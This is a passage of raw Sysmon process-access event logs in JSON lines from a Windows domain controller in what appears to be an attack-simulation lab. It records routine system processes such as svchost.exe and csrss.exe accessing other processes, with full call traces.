v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127(wow64)","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4371,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C6E0600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C6E0600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4372,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4373,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4374,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.d